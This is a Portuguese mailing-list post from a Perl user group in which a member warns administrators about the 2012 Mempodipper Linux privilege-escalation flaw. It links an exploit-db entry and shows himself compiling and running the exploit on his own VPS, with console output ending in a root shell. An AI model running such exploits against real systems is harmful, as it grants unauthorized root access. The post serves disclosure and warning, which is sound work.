Acabei de testar na minha vps,
mantovani@mantovanilabs:~$ gcc mempodipper.c mantovani@mantovanilabs:~$ ls a.out apps mempodipper.c Perl perl5 mantovani@mantovanilabs:~$ chmod +x a.out mantovani@mantovanilabs:~$ ./a.out =============================== = Mempodipper = = by zx2c4 = = Jan 21, 2012 = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Waiting for ptraced child to give output on syscalls. [+] Ptrace_traceme'ing process. [+] Error message written. Single stepping to find address. [+] Resolved call address to 0x4020b8. [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/16574/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x4020ac. [+] Executing su with shellcode. # uname -a Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 EDT 2011 x86_64 GNU/Linux -- Software Engineer Just Another Perl Hacker Daniel Mantovani +5511 8538-9897 XOXO On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote: > http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge > o exploit, http://www.exploit-db.com/exploits/18411/ > > Atencao administradores, o assunto 'e serio. > > > -- > Software Engineer > Just Another Perl Hacker > Daniel Mantovani +5511 8538-9897 > XOXO >
=begin disclaimer Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ SaoPaulo-pm mailing list: SaoPaulo-pm@pm.org L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> =end disclaimer
